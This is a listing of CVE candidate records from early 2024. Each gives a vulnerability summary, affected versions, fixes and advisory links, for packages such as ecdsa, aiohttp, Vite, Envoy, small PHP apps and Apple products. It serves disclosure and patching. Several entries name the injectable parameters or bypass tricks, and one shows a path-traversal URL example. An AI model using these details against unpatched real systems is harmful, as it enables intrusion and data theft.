CVE 2024 23342 Candidate The `ecdsa` PyPI package is a pure Python implementation of ECC (Elliptic Curve Cryptography) with support for ECDSA (Elliptic Curve Digital Signature Algorithm), EdDSA (Edwards-curve Digital Signature Algorithm) and ECDH (Elliptic Curve Diffie-Hellman). Versions 0.18.0 and prior are vulnerable to the Minerva attack. As of time of publication, no known patched version exists. MISC:https://github.com/tlsfuzzer/python-ecdsa/blob/master/SECURITY.md | URL:https://github.com/tlsfuzzer/python-ecdsa/blob/master/SECURITY.md | MISC:https://github.com/tlsfuzzer/python-ecdsa/security/advisories/GHSA-wj6h-64fc-37mp | URL:https://github.com/tlsfuzzer/python-ecdsa/security/advisories/GHSA-wj6h-64fc-37mp | MISC:https://minerva.crocs.fi.muni.cz/ | URL:https://minerva.crocs.fi.muni.cz/ | MISC:https://securitypitfalls.wordpress.com/2018/08/03/constant-time-compare-in-python/ | URL:https://securitypitfalls.wordpress.com/2018/08/03/constant-time-compare-in-python/ Assigned (20240115)
CVE 2024 23341 Candidate TuiTse-TsuSin is a package for organizing the comparative corpus of Taiwanese Chinese characters and Roman characters, and extracting sentences of the Taiwanese Chinese characters and the Roman characters. Prior to version 1.3.2, when using `tuitse_html` without quoting the input, there is a html injection vulnerability. Version 1.3.2 contains a patch for the issue. As a workaround, sanitize Taigi input with HTML quotation. MISC:https://github.com/i3thuan5/TuiTse-TsuSin/commit/9d21d99d7cfcd7c42aade251fab98ec102e730ea | URL:https://github.com/i3thuan5/TuiTse-TsuSin/commit/9d21d99d7cfcd7c42aade251fab98ec102e730ea | MISC:https://github.com/i3thuan5/TuiTse-TsuSin/pull/22 | URL:https://github.com/i3thuan5/TuiTse-TsuSin/pull/22 | MISC:https://github.com/i3thuan5/TuiTse-TsuSin/security/advisories/GHSA-m4m5-j36m-8x72 | URL:https://github.com/i3thuan5/TuiTse-TsuSin/security/advisories/GHSA-m4m5-j36m-8x72 Assigned (20240115)
CVE 2024 23340 Candidate @hono/node-server is an adapter that allows users to run Hono applications on Node.js. Since v1.3.0, @hono/node-server has used its own Request object with `url` behavior that is unexpected. In the standard API, if the URL contains `..`, here called "double dots", the URL string returned by Request will be in the resolved path. However, the `url` in @hono/node-server's Request as does not resolve double dots, so `http://localhost/static/.. /foo.txt` is returned. This causes vulnerabilities when using `serveStatic`. Modern web browsers and a latest `curl` command resolve double dots on the client side, so this issue doesn't affect those using either of those tools. However, problems may occur if accessed by a client that does not resolve them. Version 1.4.1 includes the change to fix this issue. As a workaround, don't use `serveStatic`. MISC:https://github.com/honojs/node-server/blob/8cea466fd05e6d2e99c28011fc0e2c2d3f3397c9/src/request.ts#L43-L45 | URL:https://github.com/honojs/node-server/blob/8cea466fd05e6d2e99c28011fc0e2c2d3f3397c9/src/request.ts#L43-L45 | MISC:https://github.com/honojs/node-server/commit/dd9b9a9b23e3896403c90a740e7f1f0892feb402 | URL:https://github.com/honojs/node-server/commit/dd9b9a9b23e3896403c90a740e7f1f0892feb402 | MISC:https://github.com/honojs/node-server/security/advisories/GHSA-rjq5-w47x-x359 | URL:https://github.com/honojs/node-server/security/advisories/GHSA-rjq5-w47x-x359 Assigned (20240115)
CVE 2024 23339 Candidate hoolock is a suite of lightweight utilities designed to maintain a small footprint when bundled. Starting in version 2.0.0 and prior to version 2.2.1, utility functions related to object paths (`get`, `set`, and `update`) did not block attempts to access or alter object prototypes. Starting in version 2.2.1, the `get`, `set` and `update` functions throw a `TypeError` when a user attempts to access or alter inherited properties. MISC:https://github.com/elijahharry/hoolock/commit/97ae80e856774335d92743c635ffeae2f652b982 | URL:https://github.com/elijahharry/hoolock/commit/97ae80e856774335d92743c635ffeae2f652b982 | MISC:https://github.com/elijahharry/hoolock/security/advisories/GHSA-4c2g-hx49-7h25 | URL:https://github.com/elijahharry/hoolock/security/advisories/GHSA-4c2g-hx49-7h25 Assigned (20240115)
CVE 2024 23334 Candidate aiohttp is an asynchronous HTTP client/server framework for asyncio and Python. When using aiohttp as a web server and configuring static routes, it is necessary to specify the root path for static files. Additionally, the option 'follow_symlinks' can be used to determine whether to follow symbolic links outside the static root directory. When 'follow_symlinks' is set to True, there is no validation to check if reading a file is within the root directory. This can lead to directory traversal vulnerabilities, resulting in unauthorized access to arbitrary files on the system, even when symlinks are not present. Disabling follow_symlinks and using a reverse proxy are encouraged mitigations. Version 3.9.2 fixes this issue. FEDORA:FEDORA-2024-0ddda4c691 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ICUOCFGTB25WUT336BZ4UNYLSZOUVKBD/ | FEDORA:FEDORA-2024-f249b74f03 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XXWVZIVAYWEBHNRIILZVB3R3SDQNNAA7/ | MISC:https://github.com/aio-libs/aiohttp/commit/1c335944d6a8b1298baf179b7c0b3069f10c514b | URL:https://github.com/aio-libs/aiohttp/commit/1c335944d6a8b1298baf179b7c0b3069f10c514b | MISC:https://github.com/aio-libs/aiohttp/pull/8079 | URL:https://github.com/aio-libs/aiohttp/pull/8079 | MISC:https://github.com/aio-libs/aiohttp/security/advisories/GHSA-5h86-8mv2-jq9f | URL:https://github.com/aio-libs/aiohttp/security/advisories/GHSA-5h86-8mv2-jq9f Assigned (20240115)
CVE 2024 23333 Candidate LDAP Account Manager (LAM) is a webfrontend for managing entries stored in an LDAP directory. LAM's log configuration allows to specify arbitrary paths for log files. Prior to version 8.7, an attacker could exploit this by creating a PHP file and cause LAM to log some PHP code to this file. When the file is then accessed via web the code would be executed. The issue is mitigated by the following: An attacker needs to know LAM's master configuration password to be able to change the main settings; and the webserver needs write access to a directory that is accessible via web. LAM itself does not provide any such directories. The issue has been fixed in 8.7. As a workaround, limit access to LAM configuration pages to authorized users. MISC:https://github.com/LDAPAccountManager/lam/releases/tag/8.7 | URL:https://github.com/LDAPAccountManager/lam/releases/tag/8.7 | MISC:https://github.com/LDAPAccountManager/lam/security/advisories/GHSA-fm9w-7m7v-wxqv | URL:https://github.com/LDAPAccountManager/lam/security/advisories/GHSA-fm9w-7m7v-wxqv Assigned (20240115)
CVE 2024 23332 Candidate The Notary Project is a set of specifications and tools intended to provide a cross-industry standard for securing software supply chains by using authentic container images and other OCI artifacts. An external actor with control of a compromised container registry can provide outdated versions of OCI artifacts, such as Images. This could lead artifact consumers with relaxed trust policies (such as `permissive` instead of `strict`) to potentially use artifacts with signatures that are no longer valid, making them susceptible to any exploits those artifacts may contain. In Notary Project, an artifact publisher can control the validity period of artifact by specifying signature expiry during the signing process. Using shorter signature validity periods along with processes to periodically resign artifacts, allows artifact producers to ensure that their consumers will only receive up-to-date artifacts. Artifact consumers should correspondingly use a `strict` or equivalent trust policy that enforces signature expiry. Together these steps enable use of up-to-date artifacts and safeguard against rollback attack in the event of registry compromise. The Notary Project offers various signature validation options such as `permissive`, `audit` and `skip` to support various scenarios. These scenarios includes 1) situations demanding urgent workload deployment, necessitating the bypassing of expired or revoked signatures; 2) auditing of artifacts lacking signatures without interrupting workload; and 3) skipping of verification for specific images that might have undergone validation through alternative mechanisms. Additionally, the Notary Project supports revocation to ensure the signature freshness. Artifact publishers can sign with short-lived certificates and revoke older certificates when necessary. This revocation serves as a signal to inform artifact consumers that the corresponding unexpired artifact is no longer approved by the publisher. This enables the artifact publisher to control the validity of the signature independently of their ability to manage artifacts in a compromised registry. MISC:https://github.com/notaryproject/specifications/commit/cdabdd1042de2999c685fa5d422a785ded9c983a | URL:https://github.com/notaryproject/specifications/commit/cdabdd1042de2999c685fa5d422a785ded9c983a | MISC:https://github.com/notaryproject/specifications/security/advisories/GHSA-57wx-m636-g3g8 | URL:https://github.com/notaryproject/specifications/security/advisories/GHSA-57wx-m636-g3g8 Assigned (20240115)
CVE 2024 23331 Candidate Vite is a frontend tooling framework for javascript. The Vite dev server option `server.fs.deny` can be bypassed on case-insensitive file systems using case-augmented versions of filenames. Notably this affects servers hosted on Windows. This bypass is similar to CVE-2023-34092 -- with surface area reduced to hosts having case-insensitive filesystems. Since `picomatch` defaults to case-sensitive glob matching, but the file server doesn't discriminate; a blacklist bypass is possible. By requesting raw filesystem paths using augmented casing, the matcher derived from `config.server.fs.deny` fails to block access to sensitive files. This issue has been addressed in vite@5.0.12, vite@4.5.2, vite@3.2.8, and vite@2.9.17. Users are advised to upgrade. Users unable to upgrade should restrict access to dev servers. MISC:https://github.com/vitejs/vite/commit/91641c4da0a011d4c5352e88fc68389d4e1289a5 | URL:https://github.com/vitejs/vite/commit/91641c4da0a011d4c5352e88fc68389d4e1289a5 | MISC:https://github.com/vitejs/vite/security/advisories/GHSA-c24v-8rfc-w8vw | URL:https://github.com/vitejs/vite/security/advisories/GHSA-c24v-8rfc-w8vw | MISC:https://vitejs.dev/config/server-options.html#server-fs-deny | URL:https://vitejs.dev/config/server-options.html#server-fs-deny Assigned (20240115)
CVE 2024 23330 Candidate Tuta is an encrypted email service. In versions prior to 119.10, an attacker can attach an image in a html mail which is loaded from external resource in the default setting, which should prevent loading of external resources. When displaying emails containing external content, they should be loaded by default only after confirmation by the user. However, it could be recognized that certain embedded images (see PoC) are loaded, even though the "Automatic Reloading of Images" function is disabled by default. The reloading is also done unencrypted via HTTP and redirections are followed. This behavior is unexpected for the user, since the user assumes that external content will only be loaded after explicit manual confirmation. The loading of external content in e-mails represents a risk, because this makes the sender aware that the e-mail address is used, when the e-mail was read, which device is used and expose the user's IP address. Version 119.10 contains a patch for this issue. MISC:https://github.com/tutao/tutanota/security/advisories/GHSA-32w8-v5fc-vpp7 | URL:https://github.com/tutao/tutanota/security/advisories/GHSA-32w8-v5fc-vpp7 Assigned (20240115)
CVE 2024 2333 Candidate A vulnerability classified as critical has been found in CodeAstro Membership Management System 1.0. Affected is an unknown function of the file /add_members.php. The manipulation of the argument fullname leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-256284. MISC:VDB-256284 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.256284 | MISC:VDB-256284 | CodeAstro Membership Management System add_members.php sql injection | URL:https://vuldb.com/?id.256284 | MISC:https://github.com/0x404Ming/CVE_Hunter/blob/main/SQLi-3.md | URL:https://github.com/0x404Ming/CVE_Hunter/blob/main/SQLi-3.md Assigned (20240308)
CVE 2024 23329 Candidate changedetection.io is an open source tool designed to monitor websites for content changes. In affected versions the API endpoint `/api/v1/watch/<uuid>/history` can be accessed by any unauthorized user. As a result any unauthorized user can check one's watch history. However, because unauthorized party first needs to know a watch UUID, and the watch history endpoint itself returns only paths to the snapshot on the server, an impact on users' data privacy is minimal. This issue has been addressed in version 0.45.13. Users are advised to upgrade. There are no known workarounds for this vulnerability. MISC:https://github.com/dgtlmoon/changedetection.io/commit/402f1e47e78ecd155b1e90f30cce424ff7763e0f | URL:https://github.com/dgtlmoon/changedetection.io/commit/402f1e47e78ecd155b1e90f30cce424ff7763e0f | MISC:https://github.com/dgtlmoon/changedetection.io/security/advisories/GHSA-hcvp-2cc7-jrwr | URL:https://github.com/dgtlmoon/changedetection.io/security/advisories/GHSA-hcvp-2cc7-jrwr Assigned (20240115)
CVE 2024 23328 Candidate Dataease is an open source data visualization analysis tool. A deserialization vulnerability exists in the DataEase datasource, which can be exploited to execute arbitrary code. The location of the vulnerability code is `core/core-backend/src/main/java/io/dataease/datasource/type/Mysql.java.` The blacklist of mysql jdbc attacks can be bypassed and attackers can further exploit it for deserialized execution or reading arbitrary files. This vulnerability is patched in 1.18.15 and 2.3.0. MISC:https://github.com/dataease/dataease/commit/4128adf5fc4592b55fa1722a53b178967545d46a | URL:https://github.com/dataease/dataease/commit/4128adf5fc4592b55fa1722a53b178967545d46a | MISC:https://github.com/dataease/dataease/commit/bb540e6dc83df106ac3253f331066129a7487d1a | URL:https://github.com/dataease/dataease/commit/bb540e6dc83df106ac3253f331066129a7487d1a | MISC:https://github.com/dataease/dataease/security/advisories/GHSA-8x8q-p622-jf25 | URL:https://github.com/dataease/dataease/security/advisories/GHSA-8x8q-p622-jf25 Assigned (20240115)
CVE 2024 23327 Candidate Envoy is a high-performance edge/middle/service proxy. When PPv2 is enabled both on a listener and subsequent cluster, the Envoy instance will segfault when attempting to craft the upstream PPv2 header. This occurs when the downstream request has a command type of LOCAL and does not have the protocol block. This issue has been addressed in releases 1.29.1, 1.28.1, 1.27.3, and 1.26.7. Users are advised to upgrade. There are no known workarounds for this vulnerability. MISC:https://github.com/envoyproxy/envoy/commit/63895ea8e3cca9c5d3ab4c5c128ed1369969d54a | URL:https://github.com/envoyproxy/envoy/commit/63895ea8e3cca9c5d3ab4c5c128ed1369969d54a | MISC:https://github.com/envoyproxy/envoy/security/advisories/GHSA-4h5x-x9vh-m29j | URL:https://github.com/envoyproxy/envoy/security/advisories/GHSA-4h5x-x9vh-m29j Assigned (20240115)
CVE 2024 23325 Candidate Envoy is a high-performance edge/middle/service proxy. Envoy crashes in Proxy protocol when using an address type that isn’t supported by the OS. Envoy is susceptible to crashing on a host with IPv6 disabled and a listener config with proxy protocol enabled when it receives a request where the client presents its IPv6 address. It is valid for a client to present its IPv6 address to a target server even though the whole chain is connected via IPv4. This issue has been addressed in released 1.29.1, 1.28.1, 1.27.3, and 1.26.7. Users are advised to upgrade. There are no known workarounds for this vulnerability. MISC:https://github.com/envoyproxy/envoy/commit/bacd3107455b8d387889467725eb72aa0d5b5237 | URL:https://github.com/envoyproxy/envoy/commit/bacd3107455b8d387889467725eb72aa0d5b5237 | MISC:https://github.com/envoyproxy/envoy/security/advisories/GHSA-5m7c-mrwr-pm26 | URL:https://github.com/envoyproxy/envoy/security/advisories/GHSA-5m7c-mrwr-pm26 Assigned (20240115)
CVE 2024 23324 Candidate Envoy is a high-performance edge/middle/service proxy. External authentication can be bypassed by downstream connections. Downstream clients can force invalid gRPC requests to be sent to ext_authz, circumventing ext_authz checks when failure_mode_allow is set to true. This issue has been addressed in released 1.29.1, 1.28.1, 1.27.3, and 1.26.7. Users are advised to upgrade. There are no known workarounds for this vulnerability. MISC:https://github.com/envoyproxy/envoy/commit/29989f6cc8bfd8cd2ffcb7c42711eb02c7a5168a | URL:https://github.com/envoyproxy/envoy/commit/29989f6cc8bfd8cd2ffcb7c42711eb02c7a5168a | MISC:https://github.com/envoyproxy/envoy/security/advisories/GHSA-gq3v-vvhj-96j6 | URL:https://github.com/envoyproxy/envoy/security/advisories/GHSA-gq3v-vvhj-96j6 Assigned (20240115)
CVE 2024 23323 Candidate Envoy is a high-performance edge/middle/service proxy. The regex expression is compiled for every request and can result in high CPU usage and increased request latency when multiple routes are configured with such matchers. This issue has been addressed in released 1.29.1, 1.28.1, 1.27.3, and 1.26.7. Users are advised to upgrade. There are no known workarounds for this vulnerability. MISC:https://github.com/envoyproxy/envoy/commit/71eeee8f0f0132f39e402b0ee23b361ee2f4e645 | URL:https://github.com/envoyproxy/envoy/commit/71eeee8f0f0132f39e402b0ee23b361ee2f4e645 | MISC:https://github.com/envoyproxy/envoy/security/advisories/GHSA-x278-4w4x-r7ch | URL:https://github.com/envoyproxy/envoy/security/advisories/GHSA-x278-4w4x-r7ch Assigned (20240115)
CVE 2024 23322 Candidate Envoy is a high-performance edge/middle/service proxy. Envoy will crash when certain timeouts happen within the same interval. The crash occurs when the following are true: 1. hedge_on_per_try_timeout is enabled, 2. per_try_idle_timeout is enabled (it can only be done in configuration), 3. per-try-timeout is enabled, either through headers or configuration and its value is equal, or within the backoff interval of the per_try_idle_timeout. This issue has been addressed in released 1.29.1, 1.28.1, 1.27.3, and 1.26.7. Users are advised to upgrade. There are no known workarounds for this vulnerability. MISC:https://github.com/envoyproxy/envoy/commit/843f9e6a123ed47ce139b421c14e7126f2ac685e | URL:https://github.com/envoyproxy/envoy/commit/843f9e6a123ed47ce139b421c14e7126f2ac685e | MISC:https://github.com/envoyproxy/envoy/security/advisories/GHSA-6p83-mfmh-qv38 | URL:https://github.com/envoyproxy/envoy/security/advisories/GHSA-6p83-mfmh-qv38 Assigned (20240115)
CVE 2024 23320 Candidate Improper Input Validation vulnerability in Apache DolphinScheduler. An authenticated user can cause arbitrary, unsandboxed javascript to be executed on the server. This issue is a legacy of CVE-2023-49299. We didn't fix it completely in CVE-2023-49299, and we added one more patch to fix it. This issue affects Apache DolphinScheduler: until 3.2.1. Users are recommended to upgrade to version 3.2.1, which fixes the issue. MISC:https://github.com/apache/dolphinscheduler/pull/15487 | URL:https://github.com/apache/dolphinscheduler/pull/15487 | MISC:https://lists.apache.org/thread/25qhfvlksozzp6j9y8ozznvjdjp3lxqq | URL:https://lists.apache.org/thread/25qhfvlksozzp6j9y8ozznvjdjp3lxqq | MISC:https://lists.apache.org/thread/p7rwzdgrztdfps8x1bwx646f1mn0x6cp | URL:https://lists.apache.org/thread/p7rwzdgrztdfps8x1bwx646f1mn0x6cp | MISC:https://lists.apache.org/thread/tnf99qoc6tlnwrny4t1zk6mfszgdsokm | URL:https://lists.apache.org/thread/tnf99qoc6tlnwrny4t1zk6mfszgdsokm | MLIST:[oss-security] 20240223 CVE-2024-23320: Apache DolphinScheduler: Arbitrary js execution as root for authenticated users | URL:http://www.openwall.com/lists/oss-security/2024/02/23/3 Assigned (20240115)
CVE 2024 2332 Candidate A vulnerability was found in SourceCodester Online Mobile Management Store 1.0. It has been rated as critical. This issue affects some unknown processing of the file /admin/maintenance/manage_category.php of the component HTTP GET Request Handler. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-256283. MISC:VDB-256283 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.256283 | MISC:VDB-256283 | SourceCodester Online Mobile Management Store HTTP GET Request manage_category.php sql injection | URL:https://vuldb.com/?id.256283 | MISC:https://github.com/vanitashtml/CVE-Dumps/blob/main/Blind%20SQL%20Injection%20Manage%20Category%20-%20Mobile%20Management%20Store.md | URL:https://github.com/vanitashtml/CVE-Dumps/blob/main/Blind%20SQL%20Injection%20Manage%20Category%20-%20Mobile%20Management%20Store.md Assigned (20240308)
CVE 2024 23319 Candidate Mattermost Jira Plugin fails to protect against logout CSRF allowing an attacker to post a specially crafted message that would disconnect a user's Jira connection in Mattermost only by viewing the message. MISC:https://mattermost.com/security-updates | URL:https://mattermost.com/security-updates Assigned (20240130)
CVE 2024 23314 Candidate When HTTP/2 is configured on BIG-IP or BIG-IP Next SPK systems, undisclosed responses can cause the Traffic Management Microkernel (TMM) to terminate. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated MISC:https://my.f5.com/manage/s/article/K000137675 | URL:https://my.f5.com/manage/s/article/K000137675 Assigned (20240201)
CVE 2024 23313 Candidate An integer underflow vulnerability exists in the sopen_FAMOS_read functionality of The Biosig Project libbiosig 2.5.0 and Master Branch (ab0ee111). A specially crafted .famos file can lead to an out-of-bounds write which in turn can lead to arbitrary code execution. An attacker can provide a malicious file to trigger this vulnerability. MISC:https://talosintelligence.com/vulnerability_reports/TALOS-2024-1922 | URL:https://talosintelligence.com/vulnerability_reports/TALOS-2024-1922 Assigned (20240123)
CVE 2024 23310 Candidate A use-after-free vulnerability exists in the sopen_FAMOS_read functionality of The Biosig Project libbiosig 2.5.0 and Master Branch (ab0ee111). A specially crafted .famos file can lead to arbitrary code execution. An attacker can provide a malicious file to trigger this vulnerability. MISC:https://talosintelligence.com/vulnerability_reports/TALOS-2024-1923 | URL:https://talosintelligence.com/vulnerability_reports/TALOS-2024-1923 Assigned (20240123)
CVE 2024 2331 Candidate A vulnerability was found in SourceCodester Tourist Reservation System 1.0. It has been declared as critical. This vulnerability affects the function ad_writedata of the file System.cpp. The manipulation of the argument ad_code leads to buffer overflow. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-256282 is the identifier assigned to this vulnerability. MISC:VDB-256282 | CTI Indicators (IOB, IOC, IOA) | URL:https://vuldb.com/?ctiid.256282 | MISC:VDB-256282 | SourceCodester Tourist Reservation System System.cpp ad_writedata buffer overflow | URL:https://vuldb.com/?id.256282 | MISC:https://github.com/wkeyi0x1/vul-report/blob/main/Tourist%20Reservation%20System%20using%20C%2B%2B%20with%20Free%20Source%20Code/buffer-overflow-1.md | URL:https://github.com/wkeyi0x1/vul-report/blob/main/Tourist%20Reservation%20System%20using%20C%2B%2B%20with%20Free%20Source%20Code/buffer-overflow-1.md Assigned (20240308)
CVE 2024 23308 Candidate When a BIG-IP Advanced WAF or BIG-IP ASM policy with a Request Body Handling option is attached to a virtual server, undisclosed requests can cause the BD process to terminate. The condition results from setting the Request Body Handling option in the Header-Based Content Profile for an Allowed URL with "Apply value and content signatures and detect threat campaigns." Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated MISC:https://my.f5.com/manage/s/article/K000137416 | URL:https://my.f5.com/manage/s/article/K000137416 Assigned (20240201)
CVE 2024 23307 Candidate Integer Overflow or Wraparound vulnerability in Linux Linux kernel kernel on Linux, x86, ARM (md, raid, raid5 modules) allows Forced Integer Overflow. MISC:https://bugzilla.openanolis.cn/show_bug.cgi?id=7975 | URL:https://bugzilla.openanolis.cn/show_bug.cgi?id=7975 Assigned (20240115)
CVE 2024 23306 Candidate A vulnerability exists in BIG-IP Next CNF and SPK systems that may allow access to undisclosed sensitive files. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated MISC:https://my.f5.com/manage/s/article/K000137886 | URL:https://my.f5.com/manage/s/article/K000137886 Assigned (20240201)
CVE 2024 23305 Candidate An out-of-bounds write vulnerability exists in the BrainVisionMarker Parsing functionality of The Biosig Project libbiosig 2.5.0 and Master Branch (ab0ee111). A specially crafted .vmrk file can lead to arbitrary code execution. An attacker can provide a malicious file to trigger this vulnerability. MISC:https://talosintelligence.com/vulnerability_reports/TALOS-2024-1918 | URL:https://talosintelligence.com/vulnerability_reports/TALOS-2024-1918 Assigned (20240122)
CVE 2024 23304 Candidate Cybozu KUNAI for Android 3.0.20 to 3.0.21 allows a remote unauthenticated attacker to cause a denial-of-service (DoS) condition by performing certain operations. MISC:https://cs.cybozu.co.jp/2024/010691.html | URL:https://cs.cybozu.co.jp/2024/010691.html | MISC:https://jvn.jp/en/jp/JVN18743512/ | URL:https://jvn.jp/en/jp/JVN18743512/ Assigned (20240115)
CVE 2024 23302 Candidate Couchbase Server before 7.2.4 has a private key leak in goxdcr.log. MISC:https://docs.couchbase.com/server/current/release-notes/relnotes.html | MISC:https://forums.couchbase.com/tags/security | MISC:https://www.couchbase.com/alerts/ Assigned (20240112)
CVE 2024 23301 Candidate Relax-and-Recover (aka ReaR) through 2.7 creates a world-readable initrd when using GRUB_RESCUE=y. This allows local attackers to gain access to system secrets otherwise only readable by root. FEDORA:FEDORA-2024-49ddbf447d | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UHKMPXJNXEJJE6EVYE5HM7EKEJFQMBN7/ | FEDORA:FEDORA-2024-a2f6e5ddb8 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7JIN57LUPBI2GDJOK3PYXNHJTZT3AQTZ/ | MISC:https://github.com/rear/rear/issues/3122 | MISC:https://github.com/rear/rear/pull/3123 | MLIST:[debian-lts-announce] 20240203 [SECURITY] [DLA 3733-1] rear security update | URL:https://lists.debian.org/debian-lts-announce/2024/02/msg00003.html Assigned (20240112)
CVE 2024 23300 Candidate A use-after-free issue was addressed with improved memory management. This issue is fixed in GarageBand 10.4.11. Processing a maliciously crafted file may lead to unexpected app termination or arbitrary code execution. FULLDISC:20240313 APPLE-SA-03-12-2024-1 GarageBand 10.4.11 | URL:http://seclists.org/fulldisclosure/2024/Mar/27 | MISC:https://support.apple.com/en-us/HT214090 | URL:https://support.apple.com/en-us/HT214090 Assigned (20240112)
CVE 2024 2330 Candidate A vulnerability was found in Netentsec NS-ASG Application Security Gateway 6.3. It has been classified as critical. This affects an unknown part of the file /protocol/index.php. The manipulation of the argument IPAddr leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-256281 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-256281 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.256281 | MISC:VDB-256281 | Netentsec NS-ASG Application Security Gateway index.php sql injection | URL:https://vuldb.com/?id.256281 | MISC:https://github.com/jikedaodao/cve/blob/main/NS-ASG-sql-addmacbind.md | URL:https://github.com/jikedaodao/cve/blob/main/NS-ASG-sql-addmacbind.md Assigned (20240308)
CVE 2024 23298 Candidate A logic issue was addressed with improved state management. MISC:https://support.apple.com/en-us/HT214092 | URL:https://support.apple.com/en-us/HT214092 Assigned (20240112)
CVE 2024 23297 Candidate The issue was addressed with improved checks. This issue is fixed in tvOS 17.4, iOS 17.4 and iPadOS 17.4, watchOS 10.4. A malicious application may be able to access private information. FULLDISC:20240313 APPLE-SA-03-07-2024-5 watchOS 10.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/24 | FULLDISC:20240313 APPLE-SA-03-07-2024-6 tvOS 17.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/25 | MISC:https://support.apple.com/en-us/HT214081 | URL:https://support.apple.com/en-us/HT214081 | MISC:https://support.apple.com/en-us/HT214086 | URL:https://support.apple.com/en-us/HT214086 | MISC:https://support.apple.com/en-us/HT214088 | URL:https://support.apple.com/en-us/HT214088 Assigned (20240112)
CVE 2024 23296 Candidate A memory corruption issue was addressed with improved validation. This issue is fixed in iOS 17.4 and iPadOS 17.4. An attacker with arbitrary kernel read and write capability may be able to bypass kernel memory protections. Apple is aware of a report that this issue may have been exploited. CONFIRM:https://support.apple.com/kb/HT214084 | CONFIRM:https://support.apple.com/kb/HT214086 | CONFIRM:https://support.apple.com/kb/HT214087 | CONFIRM:https://support.apple.com/kb/HT214088 | FULLDISC:20240313 APPLE-SA-03-05-2024-1 iOS 17.4 and iPadOS 17.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/18 | FULLDISC:20240313 APPLE-SA-03-07-2024-2 macOS Sonoma 14.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/21 | FULLDISC:20240313 APPLE-SA-03-07-2024-5 watchOS 10.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/24 | FULLDISC:20240313 APPLE-SA-03-07-2024-6 tvOS 17.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/25 | FULLDISC:20240313 APPLE-SA-03-07-2024-7 visionOS 1.1 | URL:http://seclists.org/fulldisclosure/2024/Mar/26 | MISC:https://support.apple.com/en-us/HT214081 | URL:https://support.apple.com/en-us/HT214081 Assigned (20240112)
CVE 2024 23295 Candidate A permissions issue was addressed to help ensure Personas are always protected This issue is fixed in visionOS 1.1. An unauthenticated user may be able to use an unprotected Persona. FULLDISC:20240313 APPLE-SA-03-07-2024-7 visionOS 1.1 | URL:http://seclists.org/fulldisclosure/2024/Mar/26 | MISC:https://support.apple.com/en-us/HT214087 | URL:https://support.apple.com/en-us/HT214087 Assigned (20240112)
CVE 2024 23294 Candidate This issue was addressed by removing the vulnerable code. This issue is fixed in macOS Sonoma 14.4. Processing malicious input may lead to code execution. FULLDISC:20240313 APPLE-SA-03-07-2024-2 macOS Sonoma 14.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/21 | MISC:https://support.apple.com/en-us/HT214084 | URL:https://support.apple.com/en-us/HT214084 Assigned (20240112)
CVE 2024 23293 Candidate This issue was addressed through improved state management. This issue is fixed in tvOS 17.4, iOS 17.4 and iPadOS 17.4, macOS Sonoma 14.4, watchOS 10.4. An attacker with physical access may be able to use Siri to access sensitive user data. FULLDISC:20240313 APPLE-SA-03-07-2024-2 macOS Sonoma 14.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/21 | FULLDISC:20240313 APPLE-SA-03-07-2024-5 watchOS 10.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/24 | FULLDISC:20240313 APPLE-SA-03-07-2024-6 tvOS 17.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/25 | MISC:https://support.apple.com/en-us/HT214081 | URL:https://support.apple.com/en-us/HT214081 | MISC:https://support.apple.com/en-us/HT214084 | URL:https://support.apple.com/en-us/HT214084 | MISC:https://support.apple.com/en-us/HT214086 | URL:https://support.apple.com/en-us/HT214086 | MISC:https://support.apple.com/en-us/HT214088 | URL:https://support.apple.com/en-us/HT214088 Assigned (20240112)
CVE 2024 23292 Candidate This issue was addressed with improved data protection. This issue is fixed in macOS Sonoma 14.4, iOS 17.4 and iPadOS 17.4. An app may be able to access information about a user's contacts. FULLDISC:20240313 APPLE-SA-03-07-2024-2 macOS Sonoma 14.4 | URL:http://seclists.org/fulldisclosure/2024/Mar/21 | MISC:https://support.apple.com/en-us/HT214081 | URL:https://support.apple.com/en-us/HT214081 | MISC:https://support.apple.com/en-us/HT214084 | URL:https://support.apple.com/en-us/HT214084 Assigned (20240112)
